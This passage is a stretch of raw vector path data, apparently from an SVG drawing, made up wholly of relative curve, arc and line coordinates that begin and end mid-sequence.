,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-